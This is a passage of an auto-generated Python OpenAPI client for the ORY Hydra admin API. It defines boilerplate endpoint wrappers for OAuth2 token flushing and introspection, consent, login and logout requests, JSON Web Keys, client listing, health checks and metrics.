'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'client_id':
(str,),
},
'attribute_map': {
'client_id': 'client_id',
},
'location_map': {
'client_id': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__delete_o_auth2_token
)
def __flush_inactive_o_auth2_tokens(
self,
**kwargs
):
"""Flush Expired OAuth2 Access Tokens # noqa: E501
This endpoint flushes expired OAuth2 access tokens from the database. You can set a time after which no tokens will be not be touched, in case you want to keep recent tokens for auditing. Refresh tokens can not be flushed as they are deleted automatically when performing the refresh flow. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.flush_inactive_o_auth2_tokens(async_req=True)
>>> result = thread.get()
Keyword Args:
body (FlushInactiveOAuth2TokensRequest): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.flush_inactive_o_auth2_tokens = Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/oauth2/flush',
'operation_id': 'flush_inactive_o_auth2_tokens',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'body',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'body':
(FlushInactiveOAuth2TokensRequest,),
},
'attribute_map': {
},
'location_map': {
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__flush_inactive_o_auth2_tokens
)
def __get_consent_request(
self,
consent_challenge,
**kwargs
):
"""Get Consent Request Information # noqa: E501
When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider to authenticate the subject and then tell ORY Hydra now about it. If the subject authenticated, he/she must now be asked if the OAuth 2.0 Client which initiated the flow should be allowed to access the resources on the subject's behalf. The consent provider which handles this request and is a web app implemented and hosted by you. It shows a subject interface which asks the subject to grant or deny the client access to the requested scope (\"Application my-dropbox-app wants write access to all your private files\"). The consent challenge is appended to the consent provider's URL to which the subject's user-agent (browser) is redirected to. The consent provider uses that challenge to fetch information on the OAuth2 request and then tells ORY Hydra if the subject accepted or rejected the request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_consent_request(consent_challenge, async_req=True)
>>> result = thread.get()
Args:
consent_challenge (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ConsentRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['consent_challenge'] = \
consent_challenge
return self.call_with_http_info(**kwargs)
self.get_consent_request = Endpoint(
settings={
'response_type': (ConsentRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/consent',
'operation_id': 'get_consent_request',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'consent_challenge',
],
'required': [
'consent_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'consent_challenge':
(str,),
},
'attribute_map': {
'consent_challenge': 'consent_challenge',
},
'location_map': {
'consent_challenge': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_consent_request
)
def __get_json_web_key(
self,
kid,
set,
**kwargs
):
"""Fetch a JSON Web Key # noqa: E501
This endpoint returns a singular JSON Web Key, identified by the set and the specific key ID (kid). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_json_web_key(kid, set, async_req=True)
>>> result = thread.get()
Args:
kid (str): The kid of the desired key
set (str): The set
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JSONWebKeySet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['kid'] = \
kid
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.get_json_web_key = Endpoint(
settings={
'response_type': (JSONWebKeySet,),
'auth': [],
'endpoint_path': '/keys/{set}/{kid}',
'operation_id': 'get_json_web_key',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'kid',
'set',
],
'required': [
'kid',
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'kid':
(str,),
'set':
(str,),
},
'attribute_map': {
'kid': 'kid',
'set': 'set',
},
'location_map': {
'kid': 'path',
'set': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_json_web_key
)
def __get_json_web_key_set(
self,
set,
**kwargs
):
"""Retrieve a JSON Web Key Set # noqa: E501
This endpoint can be used to retrieve JWK Sets stored in ORY Hydra. A JSON Web Key (JWK) is a JavaScript Object Notation (JSON) data structure that represents a cryptographic key. A JWK Set is a JSON data structure that represents a set of JWKs. A JSON Web Key is identified by its set and key id. ORY Hydra uses this functionality to store cryptographic keys used for TLS and JSON Web Tokens (such as OpenID Connect ID tokens), and allows storing user-defined keys as well. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_json_web_key_set(set, async_req=True)
>>> result = thread.get()
Args:
set (str): The set
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JSONWebKeySet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['set'] = \
set
return self.call_with_http_info(**kwargs)
self.get_json_web_key_set = Endpoint(
settings={
'response_type': (JSONWebKeySet,),
'auth': [],
'endpoint_path': '/keys/{set}',
'operation_id': 'get_json_web_key_set',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'set',
],
'required': [
'set',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'set':
(str,),
},
'attribute_map': {
'set': 'set',
},
'location_map': {
'set': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_json_web_key_set
)
def __get_login_request(
self,
login_challenge,
**kwargs
):
"""Get a Login Request # noqa: E501
When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider (sometimes called \"identity provider\") to authenticate the subject and then tell ORY Hydra now about it. The login provider is an web-app you write and host, and it must be able to authenticate (\"show the subject a login screen\") a subject (in OAuth2 the proper name for subject is \"resource owner\"). The authentication challenge is appended to the login provider URL to which the subject's user-agent (browser) is redirected to. The login provider uses that challenge to fetch information on the OAuth2 request and then accept or reject the requested authentication process. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_login_request(login_challenge, async_req=True)
>>> result = thread.get()
Args:
login_challenge (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
LoginRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['login_challenge'] = \
login_challenge
return self.call_with_http_info(**kwargs)
self.get_login_request = Endpoint(
settings={
'response_type': (LoginRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/login',
'operation_id': 'get_login_request',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'login_challenge',
],
'required': [
'login_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'login_challenge':
(str,),
},
'attribute_map': {
'login_challenge': 'login_challenge',
},
'location_map': {
'login_challenge': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_login_request
)
def __get_logout_request(
self,
logout_challenge,
**kwargs
):
"""Get a Logout Request # noqa: E501
Use this endpoint to fetch a logout request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_logout_request(logout_challenge, async_req=True)
>>> result = thread.get()
Args:
logout_challenge (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
LogoutRequest
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['logout_challenge'] = \
logout_challenge
return self.call_with_http_info(**kwargs)
self.get_logout_request = Endpoint(
settings={
'response_type': (LogoutRequest,),
'auth': [],
'endpoint_path': '/oauth2/auth/requests/logout',
'operation_id': 'get_logout_request',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'logout_challenge',
],
'required': [
'logout_challenge',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'logout_challenge':
(str,),
},
'attribute_map': {
'logout_challenge': 'logout_challenge',
},
'location_map': {
'logout_challenge': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_logout_request
)
def __get_o_auth2_client(
self,
id,
**kwargs
):
"""Get an OAuth 2.0 Client. # noqa: E501
Get an OAUth 2.0 client by its ID. This endpoint never returns passwords. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_o_auth2_client(id, async_req=True)
>>> result = thread.get()
Args:
id (str): The id of the OAuth 2.0 Client.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OAuth2Client
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['id'] = \
id
return self.call_with_http_info(**kwargs)
self.get_o_auth2_client = Endpoint(
settings={
'response_type': (OAuth2Client,),
'auth': [],
'endpoint_path': '/clients/{id}',
'operation_id': 'get_o_auth2_client',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'id',
],
'required': [
'id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'id':
(str,),
},
'attribute_map': {
'id': 'id',
},
'location_map': {
'id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_o_auth2_client
)
def __get_version(
self,
**kwargs
):
"""Get Service Version # noqa: E501
This endpoint returns the service version typically notated using semantic versioning. If the service supports TLS Edge Termination, this endpoint does not require the `X-Forwarded-Proto` header to be set. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_version(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Version
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_version = Endpoint(
settings={
'response_type': (Version,),
'auth': [],
'endpoint_path': '/version',
'operation_id': 'get_version',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_version
)
def __introspect_o_auth2_token(
self,
token,
**kwargs
):
"""Introspect OAuth2 Tokens # noqa: E501
The introspection endpoint allows to check if a token (both refresh and access) is active or not. An active token is neither expired nor revoked. If a token is active, additional information on the token will be included. You can set additional data for a token by setting `accessTokenExtra` during the consent flow. For more information [read this blog post](https://www.oauth.com/oauth2-servers/token-introspection-endpoint/). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.introspect_o_auth2_token(token, async_req=True)
>>> result = thread.get()
Args:
token (str): The string value of the token. For access tokens, this is the \\\"access_token\\\" value returned from the token endpoint defined in OAuth 2.0. For refresh tokens, this is the \\\"refresh_token\\\" value returned.
Keyword Args:
scope (str): An optional, space separated list of required scopes. If the access token was not granted one of the scopes, the result of active will be false.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
OAuth2TokenIntrospection
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['token'] = \
token
return self.call_with_http_info(**kwargs)
self.introspect_o_auth2_token = Endpoint(
settings={
'response_type': (OAuth2TokenIntrospection,),
'auth': [],
'endpoint_path': '/oauth2/introspect',
'operation_id': 'introspect_o_auth2_token',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'token',
'scope',
],
'required': [
'token',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'token':
(str,),
'scope':
(str,),
},
'attribute_map': {
'token': 'token',
'scope': 'scope',
},
'location_map': {
'token': 'form',
'scope': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/x-www-form-urlencoded'
]
},
api_client=api_client,
callable=__introspect_o_auth2_token
)
def __is_instance_alive(
self,
**kwargs
):
"""Check Alive Status # noqa: E501
This endpoint returns a 200 status code when the HTTP server is up running. This status does currently not include checks whether the database connection is working. If the service supports TLS Edge Termination, this endpoint does not require the `X-Forwarded-Proto` header to be set. Be aware that if you are running multiple nodes of this service, the health status will never refer to the cluster state, only to a single instance. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.is_instance_alive(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
HealthStatus
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.is_instance_alive = Endpoint(
settings={
'response_type': (HealthStatus,),
'auth': [],
'endpoint_path': '/health/alive',
'operation_id': 'is_instance_alive',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
},
'attribute_map': {
},
'location_map': {
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__is_instance_alive
)
def __list_o_auth2_clients(
self,
**kwargs
):
"""List OAuth 2.0 Clients # noqa: E501
This endpoint lists all clients in the database, and never returns client secrets. As a default it lists the first 100 clients. The `limit` parameter can be used to retrieve more clients, but it has an upper bound at 500 objects. Pagination should be used to retrieve more than 500 objects. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. The \"Link\" header is also included in successful responses, which contains one or more links for pagination, formatted like so: '<https://hydra-url/admin/clients?limit={limit}&offset={offset}>; rel=\"{page}\"', where page is one of the following applicable pages: 'first', 'next', 'last', and 'previous'. Multiple links can be included in this header, and will be separated by a comma. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_o_auth2_clients(async_req=True)
>>> result = thread.get()
Keyword Args:
limit (int): The maximum amount of policies returned, upper bound is 500 policies. [optional]
offset (int): The offset from where to start looking.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[OAuth2Client]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.list_o_auth2_clients = Endpoint(
settings={
'response_type': ([OAuth2Client],),
'auth': [],
'endpoint_path': '/clients',
'operation_id': 'list_o_auth2_clients',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'limit',
'offset',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'limit':
(int,),
'offset':
(int,),
},
'attribute_map': {
'limit': 'limit',
'offset': 'offset',
},
'location_map': {
'limit': 'query',
'offset': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__list_o_auth2_clients
)
def __list_subject_consent_sessions(
self,
subject,
**kwargs
):
"""Lists All Consent Sessions of a Subject # noqa: E501
This endpoint lists all subject's granted consent sessions, including client and granted scope. If the subject is unknown or has not granted any consent sessions yet, the endpoint returns an empty JSON array with status code 200 OK. The \"Link\" header is also included in successful responses, which contains one or more links for pagination, formatted like so: '<https://hydra-url/admin/oauth2/auth/sessions/consent?subject={user}&limit={limit}&offset={offset}>; rel=\"{page}\"', where page is one of the following applicable pages: 'first', 'next', 'last', and 'previous'. Multiple links can be included in this header, and will be separated by a comma. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_subject_consent_sessions(subject, async_req=True)
>>> result = thread.get()
Args:
subject (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[PreviousConsentSession]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['subject'] = \
subject
return self.call_with_http_info(**kwargs)
self.list_subject_consent_sessions = Endpoint(
settings={
'response_type': ([PreviousConsentSession],),
'auth': [],
'endpoint_path': '/oauth2/auth/sessions/consent',
'operation_id': 'list_subject_consent_sessions',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'subject',
],
'required': [
'subject',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'subject':
(str,),
},
'attribute_map': {
'subject': 'subject',
},
'location_map': {
'subject': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__list_subject_consent_sessions
)
def __prometheus(
self,
**kwargs
):
"""Get Snapshot Metrics from the Hydra Service. # noqa: E501
If you're using k8s, you can then add annotations to your deployment like so: ``` metadata: annotations: prometheus.io/port: \"4445\" prometheus.io/path: \"/metrics/prometheus\" ``` If the service supports TLS Edge Termination, this endpoint does not require the `X-Forwarded-Proto` header to be set. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.prometheus(async_req=True)
>>> result = thread.get()
Keyword Args:
_return_http_data_only (bool): response data without head status
